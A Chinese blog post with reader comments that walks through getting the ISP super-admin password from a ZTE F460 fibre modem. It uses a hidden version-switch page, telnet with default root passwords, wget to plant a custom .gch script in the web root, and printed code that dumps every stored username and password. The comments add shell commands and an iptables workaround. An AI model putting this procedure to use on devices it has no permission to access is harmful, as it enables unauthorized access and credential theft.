F460 V6.0.0P11T2sc 2015/11出厂版本 获取telecomadmin 密码


2017/5/22 我大概看了下评论回复,目测此方法已失效,电信的估计是看到了些啥,请大家有需要的对准版本号尝试本文方法,本文方法发布日期是 2016/11/20(当时是完全自己研究的)


场景:

当前已知的方法基本上无效

  1. 无web_shell_cmd.gch

  2. db_backup_cfg.xml

  3. manager_dev_config_t.gch

  4. backupsettings.conf

  5. 只要查了光纤telnet端口封闭,并主动断掉当前的tcp链接

  6. index.gch单入口web服务


telnet方法:

拔掉光猫背后的光纤线,一定先记录好LOID,之后会用到,不过网上营业厅也可以查得到

http://192.168.1.1/hidden_version_switch.gch 选择 default version 等待重启 

http://192.168.1.1/hidden_version_switch.gch 选择自己的省份 我的是Sichuan version

然后 telnet 192.168.1.1 密码网上有 root Zte521 四川的version是 Zte521@SC 这个密码和上一步你选的那个version有关


分析了一下 /home/httpd/public/index.gch 发现只有特定的gch文件才能被index.gch来IMPORT后直接访问,否则只有通过getpage.gch 来访问。因为现在的web目录是/home/httpd/public/,这尼玛还玩了个重写单入口。

其中 在switch里包含了已经删除的web_shell_cmd.gch,那就拿他做文章。由于我只要插上光纤telnet必断,网上的方法失败。尝试写个shell脚本sleep一下等LOID注册后把密码直接输出到web根目录,可惜,他把进程也杀了。


无奈,只好写个gch读取下,保存本地先,用python起个SimpleHTTPServer,好在光猫的PATH里有wget,哎,把文件wget进/home/httpd/目录,直接命名为web_shell_cmd.gch好了,毕竟已经是不存在的文件了,还能直接被引入。


代码如下:

<% 
IMPORT FILE "common_gch.gch";
var FP_IDENTITY, FP_HANDLE, FP_OBJNAME, FP_INSTNUM;
FP_OBJNAME = "OBJ_USERINFO_ID";
FP_IDENTITY = "";

FP_INSTNUM = query_list(FP_OBJNAME, "IGD");

var name,
pwd;
for (var i = 0; i < FP_INSTNUM; i++) {
	FP_HANDLE = create_paralist();
	FP_IDENTITY = query_identity(i);
	get_inst(FP_HANDLE, FP_OBJNAME, FP_IDENTITY);
	name = get_para(FP_HANDLE, "Username");
	pwd = get_para(FP_HANDLE, "Password");
	name = delMoreSlash(name);
	pwd = delMoreSlash(pwd);
	=name;
	=" - ";
	=pwd;
	="\n";
	destroy_paralist(FP_HANDLE);
}

%>


然后插上光纤,注册LOID,静静等待1分钟,访问http://192.168.1.1/web_shell_cmd.gch


blob.png


目测其他版本雷同,自行测试。狗日的电信,留后门。


本文由Hack Blog原创,如需转载注明原文链接

作者:落 分类:漏洞 浏览:10348 评论:13
留言列表
访客
访客 写的不错,很专业,能否用脚本开启TELNET  回复
Skimige
Skimige 非常感谢  回复
访客
访客 这个怎么用呀,看不明白,求大神赐教  回复
访客
访客 怎么搞?起http服务以后就看不懂了,请大神赐教  回复
x
x 感谢落神  回复
访客
访客 1 用python起个SimpleHTTPServer
Python -m SimpleHTTPServer 80
2 telnet 192.168.1.1 进入后命令行
cd /home/httpd/
wget http://127.0.0.1/web_shell_cmd.gch
3 然后插上光纤,注册LOID,静静等待1分钟,访问http://192.168.1.1/web_shell_cmd.gch
结果为空白页面,源码也为空  回复
访客
访客 那就GG了。他们肯定又改了啥。  回复
访客
访客 直接按网上教程换成默认版本,一样LOID注册。
默认版本不会断掉telnet连接。再就可以按之前的查看超级密码了。  回复
访客
访客 我5的还有默认这个界面:
http://192.168.1.1/return2factory.html  回复
yjd
yjd 参考博主文章。我这里web目录是只读写不了。
发现注册断线,原来是被加了iptables规则。自己加条规则插到前面即可。
总结方法放上。有需要的自己看看。F460 F452测试通过。
F460 F452 获取超级密码 解决 LOID 注册断线 保留telnet 无需ttl 不用拔光纤
http://www.chinadsl.net/forum.php?mod=viewthread&tid=129215  回复
访客
访客 你的帖子删了还是屏蔽了?  回复
袁小松
袁小松 四川电信又开始恶心人了,现在是定期会删除这个文件,如果用管理员账户修改了设置,再去访问这个文件就变成了503了,重启也没效果,怀疑是被远程删除了,不折腾了,准备上TTL了。  回复
访客
访客 方法可行,已经拿到密码。另外尝试找了个好像是原来版本的web_shell_cmd.gch传上去,界面可以出来,但是输入命令一提交就报错了,不知是否有法重新做个可用的web_shell_cmd ?,这样就可以方便的拿到密码,打开telnet,以及执行更多的命令。  回复
发表评论
来宾的头像